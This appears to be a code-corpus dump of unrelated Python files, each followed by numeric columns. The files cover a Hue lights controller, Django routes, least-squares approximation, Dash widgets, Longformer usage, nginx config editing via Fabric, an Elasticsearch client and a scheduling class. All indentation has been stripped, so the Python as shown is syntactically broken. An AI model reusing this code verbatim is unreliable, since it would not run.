on_lids = [lid for lid in lids if lights[lid]['state']['on']]
args = (len(on_lids), '#%s' % utils.get_color_value(root))
harmony_colors = getattr(harmony, mode)(*args)
for lid in on_lids:
gamut = colors.get_light_gamut(lights[lid]['modelid'])
xy = self._get_xy_color(harmony_colors.pop(), gamut)
palette.append(xy)
self._set_palette(on_lids, palette)
def execute(self, action):
is_light = action[0] == 'lights'
is_group = action[0] == 'groups'
if not is_light and not is_group:
return
rid = action[1]
function = action[2]
value = action[3] if len(action) > 3 else None
lights = utils.get_lights()
groups = utils.get_groups()
# Default API request parameters
method = 'put'
endpoint = '/groups/%s/action' % rid if is_group else '/lights/%s/state' % rid
if function == 'off':
data = {'on': False}
elif function == 'on':
data = {'on': True}
elif function == 'bri':
value = int((float(value) / 100) * 255) if value else 255
data = {'bri': value}
elif function == 'shuffle':
if not is_group:
print('Shuffle can only be called on groups.'.encode('utf-8'))
return
self._shuffle_group(rid)
return True
elif function == 'rename':
endpoint = '/groups/%s' % rid if is_group else '/lights/%s' % rid
data = {'name': value}
elif function == 'effect':
data = {'effect': value}
elif function == 'color':
if value == 'random':
if is_group:
gamut = colors.GamutA
data = {'xy': self._get_random_xy_color(gamut)}
else:
gamut = colors.get_light_gamut(lights[rid]['modelid'])
data = {'xy': self._get_random_xy_color(gamut)}
else:
try:
if is_group:
gamut = colors.GamutA
else:
gamut = colors.get_light_gamut(lights[rid]['modelid'])
data = {'xy': self._get_xy_color(value, gamut)}
except ValueError:
print('Error: Invalid color. Please use a 6-digit hex color.'.encode('utf-8'))
return
elif function == 'harmony':
if not is_group:
print('Color harmonies can only be set on groups.'.encode('utf-8'))
return
root = action[4] if len(action) > 3 else None
if value not in harmony.MODES:
print('Invalid harmony mode.'.encode('utf-8'))
return
self._set_harmony(rid, value, root)
return
elif function == 'reminder':
try:
time_delta_int = int(value)
except ValueError:
print('Error: Invalid time delta for reminder.'.encode('utf-8'))
return
reminder_time = datetime.datetime.utcfromtimestamp(time.time() + time_delta_int)
method = 'post'
data = {
'name': 'Alfred Hue Reminder',
'command': {
'address': self.hue_request.api_path + endpoint,
'method': 'PUT',
'body': {'alert': 'lselect'},
},
'time': reminder_time.replace(microsecond=0).isoformat(),
}
endpoint = '/schedules'
elif function == 'set':
# if bridge is deconz, scenes are set differently.
# what we need is groups:group_id:scenes:scene_id:recall
is_deconz = False
try:
if workflow.stored_data("full_state")["config"]["modelid"] == "deCONZ":
is_deconz = True
except:
# not sure if hue also returns config/modelid
pass
if is_deconz:
method = 'put'
endpoint = '/groups/{}/scenes/{}/recall'.format(rid, value)
data = {}
else:
data = {'scene': value}
elif function == 'save':
lids = utils.get_group_lids(rid)
method = 'post'
endpoint = '/scenes'
data = {'name': value, 'lights': lids, 'recycle': False}
else:
return
# Make the request
self.hue_request.request(method, endpoint, json.dumps(data))
return
def main(workflow):
# Handle multiple queries separated with '|' (pipe) character
queries = workflow.args[0].split('|')
for query_str in queries:
query = query_str.split(':')
if query[0] == 'set_bridge':
setup.set_bridge(query[1] if len(query) > 1 else None)
else:
action = HueAction()
try:
action.execute(query)
print(('Action completed! <%s>' % query_str).encode('utf-8'))
except ValueError:
pass
if __name__ == '__main__':
workflow = Workflow()
sys.exit(workflow.run(main)) | 7,062 | 2,093 |
from django.urls import path
from accounts.views import user_profile, LogoutView, LoginView, RegisterView, user_profile_edit
urlpatterns = [
# path('login/', login_user, name='login user'),
path('login/', LoginView.as_view(), name='login user'), # CBV
# path('logout/', logout_user, name='logout user'),
path('logout/', LogoutView.as_view(), name='logout user'), # CBV
# path('register/', register_user, name='register user'),
path('register/', RegisterView.as_view(), name='register user'), # CBV
# path('profile/', user_profile, name='current user profile'),
path('profile/<int:pk>', user_profile, name='user profile'),
path('edit/<int:pk>', user_profile_edit, name='user profile edit'),
]
| 734 | 236 |
"""
Approximation of functions by linear combination of basis functions in
function spaces and the least squares method or the collocation method
for determining the coefficients.
"""
from __future__ import print_function
import sympy as sym
import numpy as np
import mpmath
import matplotlib.pyplot as plt
#import scitools.std as plt
def least_squares_non_verbose(f, psi, Omega, symbolic=True):
"""
Given a function f(x) on an interval Omega (2-list)
return the best approximation to f(x) in the space V
spanned by the functions in the list psi.
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
x = sym.Symbol('x')
for i in range(N+1):
for j in range(i, N+1):
integrand = psi[i]*psi[j]
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
A[i,j] = A[j,i] = I
integrand = psi[i]*f
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i,0] = I
c = mpmath.lu_solve(A, b) # numerical solve
c = [c[i,0] for i in range(c.rows)]
u = sum(c[i]*psi[i] for i in range(len(psi)))
return u, c
def least_squares(f, psi, Omega, symbolic=True):
"""
Given a function f(x) on an interval Omega (2-list)
return the best approximation to f(x) in the space V
spanned by the functions in the list psi.
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
x = sym.Symbol('x')
print('...evaluating matrix...', end=' ')
for i in range(N+1):
for j in range(i, N+1):
print('(%d,%d)' % (i, j))
integrand = psi[i]*psi[j]
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
# Could not integrate symbolically, use numerical int.
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
A[i,j] = A[j,i] = I
integrand = psi[i]*f
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
# Could not integrate symbolically, use numerical int.
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i,0] = I
print()
print('A:\n', A, '\nb:\n', b)
if symbolic:
c = A.LUsolve(b) # symbolic solve
# c is a sympy Matrix object, numbers are in c[i,0]
c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
else:
c = mpmath.lu_solve(A, b) # numerical solve
c = [c[i,0] for i in range(c.rows)]
print('coeff:', c)
u = sum(c[i]*psi[i] for i in range(len(psi)))
print('approximation:', u)
return u, c
def numerical_linsys_solve(A, b, floating_point_calc='sympy'):
"""
Given a linear system Au=b as sympy arrays, solve the
system using different floating-point software.
floating_point_calc may be 'sympy', 'numpy.float64',
'numpy.float32'.
This function is used to investigate ill-conditioning
of linear systems arising from approximation methods.
"""
if floating_point_calc == 'sympy':
#mpmath.mp.dsp = 10 # does not affect the computations here
A = mpmath.fp.matrix(A)
b = mpmath.fp.matrix(b)
print('A:\n', A, '\nb:\n', b)
c = mpmath.fp.lu_solve(A, b)
#c = mpmath.lu_solve(A, b) # more accurate
print('mpmath.fp.lu_solve:', c)
elif floating_point_calc.startswith('numpy'):
import numpy as np
# Double precision (float64) by default
A = np.array(A.evalf())
b = np.array(b.evalf())
if floating_point_calc == 'numpy.float32':
# Single precision
A = A.astype(np.float32)
b = b.astype(np.float32)
c = np.linalg.solve(A, b)
print('numpy.linalg.solve, %s:' % floating_point_calc, c)
def least_squares_orth(f, psi, Omega, symbolic=True):
"""
Same as least_squares, but for orthogonal
basis such that one avoids calling up standard
Gaussian elimination.
"""
N = len(psi) - 1
A = [0]*(N+1) # plain list to hold symbolic expressions
b = [0]*(N+1)
x = sym.Symbol('x')
print('...evaluating matrix...', end=' ')
for i in range(N+1):
print('(%d,%d)' % (i, i))
# Assume orthogonal psi can be be integrated symbolically
# and that this is a successful/possible integration
A[i] = sym.integrate(psi[i]**2, (x, Omega[0], Omega[1]))
# Fallback on numerical integration if f*psi is too difficult
# to integrate
integrand = psi[i]*f
if symbolic:
I = sym.integrate(integrand, (x, Omega[0], Omega[1]))
if not symbolic or isinstance(I, sym.Integral):
print('numerical integration of', integrand)
integrand = sym.lambdify([x], integrand, 'mpmath')
I = mpmath.quad(integrand, [Omega[0], Omega[1]])
b[i] = I
print('A:\n', A, '\nb:\n', b)
c = [b[i]/A[i] for i in range(len(b))]
print('coeff:', c)
u = 0
#for i in range(len(psi)):
# u += c[i]*psi[i]
u = sum(c[i]*psi[i] for i in range(len(psi)))
print('approximation:', u)
return u, c
def trapezoidal(values, dx):
"""
Integrate a function whose values on a mesh with spacing dx
are in the array values.
"""
#return dx*np.sum(values)
return dx*(np.sum(values) - 0.5*values[0] - 0.5*values[-1])
def least_squares_numerical(f, psi, N, x,
integration_method='scipy',
orthogonal_basis=False):
"""
Given a function f(x) (Python function), a basis specified by the
Python function psi(x, i), and a mesh x (array), return the best
approximation to f(x) in in the space V spanned by the functions
in the list psi. The best approximation is represented as an array
of values corresponding to x. All calculations are performed
numerically. integration_method can be `scipy` or `trapezoidal`
(the latter uses x as mesh for evaluating f).
"""
import scipy.integrate
A = np.zeros((N+1, N+1))
b = np.zeros(N+1)
if not callable(f) or not callable(psi):
raise TypeError('f and psi must be callable Python functions')
Omega = [x[0], x[-1]]
dx = x[1] - x[0] # assume uniform partition
print('...evaluating matrix...', end=' ')
for i in range(N+1):
j_limit = i+1 if orthogonal_basis else N+1
for j in range(i, j_limit):
print('(%d,%d)' % (i, j))
if integration_method == 'scipy':
A_ij = scipy.integrate.quad(
lambda x: psi(x,i)*psi(x,j),
Omega[0], Omega[1], epsabs=1E-9, epsrel=1E-9)[0]
elif integration_method == 'sympy':
A_ij = mpmath.quad(
lambda x: psi(x,i)*psi(x,j),
[Omega[0], Omega[1]])
else:
values = psi(x,i)*psi(x,j)
A_ij = trapezoidal(values, dx)
A[i,j] = A[j,i] = A_ij
if integration_method == 'scipy':
b_i = scipy.integrate.quad(
lambda x: f(x)*psi(x,i), Omega[0], Omega[1],
epsabs=1E-9, epsrel=1E-9)[0]
elif integration_method == 'sympy':
b_i = mpmath.quad(
lambda x: f(x)*psi(x,i), [Omega[0], Omega[1]])
else:
values = f(x)*psi(x,i)
b_i = trapezoidal(values, dx)
b[i] = b_i
c = b/np.diag(A) if orthogonal_basis else np.linalg.solve(A, b)
u = sum(c[i]*psi(x, i) for i in range(N+1))
return u, c
def interpolation(f, psi, points):
"""
Given a function f(x), return the approximation to
f(x) in the space V, spanned by psi, that interpolates
f at the given points. Must have len(points) = len(psi)
"""
N = len(psi) - 1
A = sym.zeros(N+1, N+1)
b = sym.zeros(N+1, 1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i] (alternative to subs?)
psi_sym = psi # save symbolic expression
x = sym.Symbol('x')
psi = [sym.lambdify([x], psi[i], 'mpmath') for i in range(N+1)]
f = sym.lambdify([x], f, 'mpmath')
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
print('(%d,%d)' % (i, j))
A[i,j] = psi[j](points[i])
b[i,0] = f(points[i])
print()
print('A:\n', A, '\nb:\n', b)
c = A.LUsolve(b)
# c is a sympy Matrix object, turn to list
c = [sym.simplify(c[i,0]) for i in range(c.shape[0])]
print('coeff:', c)
# u = sym.simplify(sum(c[i,0]*psi_sym[i] for i in range(N+1)))
u = sym.simplify(sum(c[i]*psi_sym[i] for i in range(N+1)))
print('approximation:', u)
return u, c
collocation = interpolation # synonym in this module
def regression(f, psi, points):
"""
Given a function f(x), return the approximation to
f(x) in the space V, spanned by psi, using a regression
method based on points. Must have len(points) > len(psi).
"""
N = len(psi) - 1
m = len(points) - 1
# Use numpy arrays and numerical computing
B = np.zeros((N+1, N+1))
d = np.zeros(N+1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i]
x = sym.Symbol('x')
psi_sym = psi # save symbolic expression for u
psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
f = sym.lambdify([x], f)
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
B[i,j] = 0
for k in range(m+1):
B[i,j] += psi[i](points[k])*psi[j](points[k])
d[i] = 0
for k in range(m+1):
d[i] += psi[i](points[k])*f(points[k])
print('B:\n', B, '\nd:\n', d)
c = np.linalg.solve(B, d)
print('coeff:', c)
u = sum(c[i]*psi_sym[i] for i in range(N+1))
print('approximation:', sym.simplify(u))
return u, c
def regression_with_noise(f, psi, points):
"""
Given a data points in the array f, return the approximation
to the data in the space V, spanned by psi, using a regression
method based on f and the corresponding coordinates in points.
Must have len(points) = len(f) > len(psi).
"""
N = len(psi) - 1
m = len(points) - 1
# Use numpy arrays and numerical computing
B = np.zeros((N+1, N+1))
d = np.zeros(N+1)
# Wrap psi and f in Python functions rather than expressions
# so that we can evaluate psi at points[i]
x = sym.Symbol('x')
psi_sym = psi # save symbolic expression for u
psi = [sym.lambdify([x], psi[i]) for i in range(N+1)]
if not isinstance(f, np.ndarray):
raise TypeError('f is %s, must be ndarray' % type(f))
print('...evaluating matrix...')
for i in range(N+1):
for j in range(N+1):
B[i,j] = 0
for k in range(m+1):
B[i,j] += psi[i](points[k])*psi[j](points[k])
d[i] = 0
for k in range(m+1):
d[i] += psi[i](points[k])*f[k]
print('B:\n', B, '\nd:\n', d)
c = np.linalg.solve(B, d)
print('coeff:', c)
u = sum(c[i]*psi_sym[i] for i in range(N+1))
print('approximation:', sym.simplify(u))
return u, c
def comparison_plot(
f, u, Omega, filename='tmp',
plot_title='', ymin=None, ymax=None,
u_legend='approximation',
points=None, point_values=None, points_legend=None,
legend_loc='upper right',
show=True):
"""Compare f(x) and u(x) for x in Omega in a plot."""
x = sym.Symbol('x')
print('f:', f)
print('u:', u)
f = sym.lambdify([x], f, modules="numpy")
u = sym.lambdify([x], u, modules="numpy")
if len(Omega) != 2:
raise ValueError('Omega=%s must be an interval (2-list)' % str(Omega))
# When doing symbolics, Omega can easily contain symbolic expressions,
# assume .evalf() will work in that case to obtain numerical
# expressions, which then must be converted to float before calling
# linspace below
if not isinstance(Omega[0], (int,float)):
Omega[0] = float(Omega[0].evalf())
if not isinstance(Omega[1], (int,float)):
Omega[1] = float(Omega[1].evalf())
resolution = 601 # no of points in plot (high resolution)
xcoor = np.linspace(Omega[0], Omega[1], resolution)
# Vectorized functions expressions does not work with
# lambdify'ed functions without the modules="numpy"
exact = f(xcoor)
approx = u(xcoor)
plt.figure()
plt.plot(xcoor, approx, '-')
plt.plot(xcoor, exact, '--')
legends = [u_legend, 'exact']
if points is not None:
if point_values is None:
# Use f
plt.plot(points, f(points), 'ko')
else:
# Use supplied points
plt.plot(points, point_values, 'ko')
if points_legend is not None:
legends.append(points_legend)
else:
legends.append('points')
plt.legend(legends, loc=legend_loc)
plt.title(plot_title)
plt.xlabel('x')
if ymin is not None and ymax is not None:
plt.axis([xcoor[0], xcoor[-1], ymin, ymax])
plt.savefig(filename + '.pdf')
plt.savefig(filename + '.png')
if show:
plt.show()
if __name__ == '__main__':
print('Module file not meant for execution.')
| 13,790 | 4,925 |
# * N <= 500, M <= 10000, max(p), max(a) <= 1e6
# * 10 คะแนน : N, max(p), max(a) <= 10, M <= 15
# * 20 คะแนน : N <= 20, M <= 100
# * 30 คะแนน : N <= 69, M <= 420
# * 50 คะแนน : ไม่มีเงื่อนไขเพิ่มเติม
def useGenerator(gen):
gen("s1", "sample1", 5, 10, 10, 10)
gen("s2", "sample2", 7, 10, 9, 9)
gen(1, "112 ติดบั๊ก", 10, 15, 10, 10)
gen(2, 69, 20, 100, 10**4, 10**4)
gen(3, 420, 20, 100, 10**6, 10**6)
gen(4, 69420, 69, 420, 10**6, 10**6)
gen(5, 177013, 69, 420, 10**6, 10**6)
gen(6, "germany", 500, 10000, 10**6, 10**6)
gen(7, "jail", 500, 10000, 10**6, 10**6)
gen(8, "bruh wtf", 500, 10000, 10**6, 10**6)
gen(9, "meta", 500, 10000, 10**6, 10**6)
gen(10, 101336844, 500, 10000, 10**6, 10**6)
# gen(11, 69, 1000, 100000, 10**6, 10**6)
# gen(12, 69, 2021, 100000, 10**4, 10**4)
| 835 | 639 |
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
def get_options_from_list(list_):
list_label_value = []
for value in list_:
list_label_value.append({"value": value, "label": value})
return list_label_value
def get_options_from_dict(dict_):
list_label_value = []
for key_value, label in dict_.items():
list_label_value.append({"value": key_value, "label": label})
return list_label_value
def get_item_radio_items(id, items, legend, from_dict=True, value_idx=0):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
return dbc.FormGroup(
[
html.P(legend),
dcc.RadioItems(
id=id,
options=options,
value=options[value_idx]["value"],
labelStyle={"display": "inline-block", "margin": "5px"},
),
]
)
def get_drop_down(id, items, legend, from_dict=True, value=None, multi=False, clearable=False):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
if value is None:
value = options[0]["value"]
if multi and type(value) != list:
value = [value]
return dbc.FormGroup(
[
html.P(legend),
dcc.Dropdown(
id=id,
options=options,
value=value,
clearable=clearable,
multi=multi,
placeholder="Nothing is selected.",
),
]
)
def get_check_list(id, items, legend, from_dict=True, value=None):
if from_dict:
options = get_options_from_dict(items)
else:
options = get_options_from_list(items)
if value is None:
value = options[0]["value"]
return dbc.FormGroup(
[
html.P(legend),
dcc.Checklist(id=id, options=options, value=[value], labelStyle={"display": "inline-block"}),
]
)
def get_range_slider(id, min, max, legend):
return dbc.FormGroup(
[
html.P(legend),
dcc.RangeSlider(
id=id,
min=min,
max=max,
value=[min, max],
marks=dict(zip(range(min, max + 1, 5), [str(elem) for elem in range(min, max + 1, 5)])),
step=None,
),
html.Br(),
]
)
| 2,532 | 779 |
# from transformers import ReformerModel, ReformerTokenizer
# import torch
#
# tokenizer = ReformerTokenizer.from_pretrained('google/reformer-crime-and-punishment')
# model = ReformerModel.from_pretrained('google/reformer-crime-and-punishment')
#
# input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
# print(input_ids.shape)
# outputs = model(input_ids)
#
# pooled_output = torch.mean(outputs[0], dim=1)
#
# last_hidden_states = outputs[0]
import torch
from longformer.longformer import Longformer, LongformerConfig
from longformer.sliding_chunks import pad_to_window_size
from transformers import RobertaTokenizer
config = LongformerConfig.from_pretrained('longformer-base-4096/')
# choose the attention mode 'n2', 'tvm' or 'sliding_chunks'
# 'n2': for regular n2 attantion
# 'tvm': a custom CUDA kernel implementation of our sliding window attention
# 'sliding_chunks': a PyTorch implementation of our sliding window attention
config.attention_mode = 'sliding_chunks'
model = Longformer.from_pretrained('longformer-base-4096/', config=config)
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
tokenizer.model_max_length = model.config.max_position_embeddings
SAMPLE_TEXT = ' '.join(['Hello world! '] * 1000) # long input document
SAMPLE_TEXT = f'{tokenizer.cls_token}{SAMPLE_TEXT}{tokenizer.eos_token}'
input_ids = torch.tensor(tokenizer.encode(SAMPLE_TEXT)).unsqueeze(0) # batch of size 1
# TVM code doesn't work on CPU. Uncomment this if `config.attention_mode = 'tvm'`
# model = model.cuda(); input_ids = input_ids.cuda()
# Attention mask values -- 0: no attention, 1: local attention, 2: global attention
attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=input_ids.device) # initialize to local attention
attention_mask[:, [1, 4, 21,]] = 2 # Set global attention based on the task. For example,
# classification: the <s> token
# QA: question tokens
# padding seqlen to the nearest multiple of 512. Needed for the 'sliding_chunks' attention
input_ids, attention_mask = pad_to_window_size(
input_ids, attention_mask, config.attention_window[0], tokenizer.pad_token_id)
output = model(input_ids, attention_mask=attention_mask)[0]
| 2,333 | 777 |
from operator import itemgetter
from platform import python_version_tuple
from sys import version
if version[0] == "2":
from cStringIO import StringIO
else:
from functools import reduce
from io import StringIO
from copy import copy
from itertools import filterfalse
from os import remove, path
from string import Template
from tempfile import mkstemp
from fabric.contrib.files import exists
from fabric.operations import get, put
from nginxparser import loads, dumps, load
class DollarTemplate(Template):
delimiter = "$"
idpattern = r"[a-z][_a-z0-9]*"
def ensure_semicolon(s): # type: (str) -> str or None
if s is None:
return s
s = s.rstrip()
return s if not len(s) or s[-1] == ";" else "{};".format(s)
def _copy_or_marshal(block): # type: (str or list) -> list
return copy(block) if isinstance(block, list) else loads(block)
def merge_into(
server_name, parent_block, *child_blocks
): # type: (str, str or list, *list) -> list
parent_block = _copy_or_marshal(parent_block)
server_name_idx = -1
indicies = set()
break_ = False
for i, tier in enumerate(parent_block):
for j, statement in enumerate(tier):
for k, stm in enumerate(statement):
if statement[k][0] == "server_name" and statement[k][1] == server_name:
server_name_idx = i
indicies.add(k)
if break_:
break
elif statement[k][0] == "listen" and statement[k][1].startswith("443"):
break_ = True
if k in indicies:
break
server_name_idx += 1
if not len(indicies):
return parent_block
length = len(parent_block[-1])
if server_name_idx >= length:
server_name_idx = length - 1
parent_block[-1][server_name_idx] += list(
map(
lambda child_block: child_block[0]
if isinstance(child_block[0], list)
else loads(child_block)[0],
child_blocks,
)
)
parent_block[-1][server_name_idx] = list(
reversed(uniq(reversed(parent_block[-1][-1]), itemgetter(0)))
)
return parent_block
def merge_into_str(
server_name, parent_block, *child_blocks
): # type: (str or list, *list) -> str
return dumps(merge_into(server_name, parent_block, *child_blocks))
def upsert_by_location(
server_name, location, parent_block, child_block
): # type: (str, str or list, str or list) -> list
return merge_into(
server_name,
remove_by_location(_copy_or_marshal(parent_block), location),
child_block,
)
def remove_by_location(parent_block, location): # type: (list, str) -> list
parent_block = _copy_or_marshal(parent_block)
parent_block = list(
map(
lambda block: list(
map(
lambda subblock: list(
filterfalse(
lambda subsubblock: len(subsubblock)
and len(subsubblock[0]) > 1
and subsubblock[0][1] == location,
subblock,
)
),
block,
)
),
parent_block,
)
)
return parent_block
def _prevent_slash(s): # type: (str) -> str
return s[1:] if s.startswith("/") else s
def apply_attributes(
block, attribute, append=False
): # type: (str or list, str or list, bool) -> list
block = _copy_or_marshal(block)
attribute = _copy_or_marshal(attribute)
if append:
block[-1][-1] += attribute
else:
changed = False
for bid, _block in enumerate(block[-1]):
for sid, subblock in enumerate(_block):
if isinstance(subblock[0], list):
block[-1][bid] = attribute + [block[-1][bid][sid]]
changed = True
break
if not changed:
block[-1][-1] += attribute
# TODO: Generalise these lines to a `remove_duplicates` or `remove_consecutive_duplicates` function
prev_key = None
subseq_removed = []
if not isinstance(block[0][1], list):
return block
block[0][1].reverse()
for subblock in block[0][1]:
if (
prev_key is not None
and prev_key == subblock[0]
and prev_key in ("server_name", "listen")
):
continue
subseq_removed.append(subblock)
prev_key = subblock[0]
subseq_removed.reverse()
block[0][1] = subseq_removed
return block
def upsert_upload(new_conf, name="default", use_sudo=True):
conf_name = "/etc/nginx/sites-enabled/{nginx_conf}".format(nginx_conf=name)
if not conf_name.endswith(".conf") and not exists(conf_name):
conf_name += ".conf"
# cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
tempfile = mkstemp(name)[1]
get(remote_path=conf_name, local_path=tempfile, use_sudo=use_sudo)
with open(tempfile, "rt") as f:
conf = load(f)
new_conf = new_conf(conf)
remove(tempfile)
sio = StringIO()
sio.write(dumps(new_conf))
return put(sio, conf_name, use_sudo=use_sudo)
def get_parsed_remote_conf(
conf_name, suffix="nginx", use_sudo=True
): # type: (str, str, bool) -> [str]
if not conf_name.endswith(".conf") and not exists(conf_name):
conf_name += ".conf"
# cStringIO.StringIO, StringIO.StringIO, TemporaryFile, SpooledTemporaryFile all failed :(
tempfile = mkstemp(suffix)[1]
get(remote_path=conf_name, local_path=tempfile, use_sudo=use_sudo)
with open(tempfile, "rt") as f:
conf = load(f)
remove(tempfile)
return conf
def ensure_nginxparser_instance(conf_file): # type: (str) -> [[[str]]]
if isinstance(conf_file, list):
return conf_file
elif hasattr(conf_file, "read"):
return load(conf_file)
elif path.isfile(conf_file):
with open(conf_file, "rt") as f:
return load(f)
else:
return loads(conf_file)
def uniq(iterable, key=lambda x: x):
"""
Remove duplicates from an iterable. Preserves order.
:type iterable: Iterable[Ord => A]
:param iterable: an iterable of objects of any orderable type
:type key: Callable[A] -> (Ord => B)
:param key: optional argument; by default an item (A) is discarded
if another item (B), such that A == B, has already been encountered and taken.
If you provide a key, this condition changes to key(A) == key(B); the callable
must return orderable objects.
"""
# Enumerate the list to restore order lately; reduce the sorted list; restore order
def append_unique(acc, item):
return acc if key(acc[-1][1]) == key(item[1]) else acc.append(item) or acc
srt_enum = sorted(enumerate(iterable), key=lambda item: key(item[1]))
return [item[1] for item in sorted(reduce(append_unique, srt_enum, [srt_enum[0]]))]
| 7,091 | 2,231 |
from setuptools import setup
from setuptools.command.install import install as _install
class install(_install):
def run(self):
_install.run(self)
setup(
cmdclass = { 'install' : install },
name = 'hydra',
version = '0.1',
author = 'tatsy',
author_email = 'tatsy.mail@gmail.com',
url = 'https://github.com/tatsy/hydra.git',
description = 'Python HDR image processing library.',
license = 'MIT',
classifiers = [
'Development Status :: 1 - Planning',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4'
],
packages = [
'hydra',
'hydra.core',
'hydra.eo',
'hydra.filters',
'hydra.gen',
'hydra.io',
'hydra.tonemap'
]
)
| 832 | 282 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-05-06 08:15
from __future__ import unicode_literals
from django.db import migrations
from ..compat import JSONField
class Migration(migrations.Migration):
dependencies = [("appmail", "0002_add_template_description")]
operations = [
migrations.AddField(
model_name="emailtemplate",
name="test_context",
field=JSONField(
default=dict,
blank=True,
help_text=(
"Dummy JSON used for test rendering (set automatically on first "
"save)."
),
),
)
]
| 689 | 200 |
"""Client that handles query to elasticsearch"""
import string
from typing import List
from elasticsearch_dsl import Search
from alexafsm.test_helpers import recordable as rec
from elasticsearch_dsl.response import Response
from tests.skillsearch.skill_settings import SkillSettings
from tests.skillsearch.skill import Skill, INDEX
from tests.skillsearch.dynamodb import DynamoDB
es_search: Search = Search(index=INDEX).source(excludes=['html'])
def get_es_skills(query: str, top_n: int, category: str = None, keyphrase: str = None) -> (int, List[Skill]):
"""Return the total number of hits and the top_n skills"""
result = get_es_results(query, category, keyphrase).to_dict()
return result['hits']['total'], [Skill.from_es(h) for h in result['hits']['hits'][:top_n]]
def recordable(func):
def _get_record_dir():
return SkillSettings().get_record_dir()
def _is_playback():
return SkillSettings().playback
def _is_record():
return SkillSettings().record
return rec(_get_record_dir, _is_playback, _is_record)(func)
@recordable
def get_es_results(query: str, category: str, keyphrase: str) -> Response:
results = _get_es_results(query, category, keyphrase, strict=True)
if len(results.hits) == 0:
# relax constraints a little
return _get_es_results(query, category, keyphrase, strict=False)
else:
return results
def _get_es_results(query: str, category: str, keyphrase: str, strict: bool) -> Response:
skill_search = es_search
if category:
skill_search = skill_search.query('match',
category=string.capwords(category)
.replace(' And ', ' & ')
.replace('Movies & Tv', 'Movies & TV'))
if keyphrase:
skill_search = skill_search.query('match', keyphrases=keyphrase)
if query:
operator = 'and' if strict else 'or'
skill_search = skill_search.query('multi_match',
query=query,
fields=['name', 'description', 'usages', 'keyphrases'],
minimum_should_match='50%',
operator=operator) \
.highlight('description', order='score', pre_tags=['*'], post_tags=['*']) \
.highlight('title', order='score', pre_tags=['*'], post_tags=['*']) \
.highlight('usages', order='score', pre_tags=['*'], post_tags=['*'])
return skill_search.execute()
@recordable
def get_user_info(user_id: str, request_id: str) -> dict: # NOQA
"""Get information of user with user_id from dynamodb. request_id is simply there so that we can
record different responses from dynamodb for the same user during playback"""
return DynamoDB().get_user_info(user_id)
@recordable
def register_new_user(user_id: str):
DynamoDB().register_new_user(user_id)
| 3,006 | 885 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Includes the Schedule class, validation functions, and compilation functions
for compiling a schedule of files to process.
Methods:
compile: shortcut for validating the loaded configuration, then
performing the search, and _resolve functions
load: load the schedule.yaml file into a dictionary
get_file_paths: return a dictionary of files for a given subject, task, and
data source.
search: search the data_path for all files matching the patterns.
validate_schema: validate yaml contents against the schedule configuration
schema.
validate_data_source_names: validates that the data source names contained
in the configuration match a given list of possible data source names
validate_patterns: validates that the regex patterns return named fields
matching a list of required named fields
Configuration schema (YAML):
{task_name (str):
{data_source_name (str):
{filetype (str): pattern (str)}
}
}
"""
from schema import Schema
import os
import re
import pandas as pd
import numpy as np
import functools
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
# TODO(janmtl): Schedule should extend pd.DataFrame
class Schedule(object):
"""
An object for scheduling files to be processed by data sources.
Args:
path (str): path to YAML schedule configuration file.
Attributes:
path (str): path to YAML schedule configuration file.
raw (dict): the dictionary resulting from the YAML configuration.
sched_df (pands.DataFrame): a Pandas DataFrame listing all files found
"""
def __init__(self, raw):
self.raw = self.validate_schema(raw)
self.sched_df = None
self.subjects = []
self.valid_subjects = []
self.invalid_subjects = []
@memoize
def get_subschedule(self, task_name, data_source_name):
"""Fetches the schedule for a given task and data source."""
return self.raw[task_name][data_source_name]
def compile(self, data_paths):
"""Search the data path for the files to add to the schedule."""
# TODO(janmtl): this should accept globs
# TODO(janmtl): should be able to pass a list of excluded subjects
if not isinstance(data_paths, list):
data_paths = list(data_paths)
files_df = self.search(self.raw, data_paths)
self.sched_df = self._resolve(files_df)
self.sched_df[['Subject', 'Task_Order']] = \
self.sched_df[['Subject', 'Task_Order']].astype(np.int64)
self.subjects = list(np.unique(self.sched_df['Subject']))
# TODO(janmtl): The function that checks the integrity of a subject's data
# should also return which subjects are broken and why
def validate_files(self):
"""Iterate over subjects and make sure that they all have all the files
they need."""
cf = (self.sched_df.pivot_table(index='Subject',
columns=['Data_Source_Name',
'Task_Name',
'File'],
values='Path',
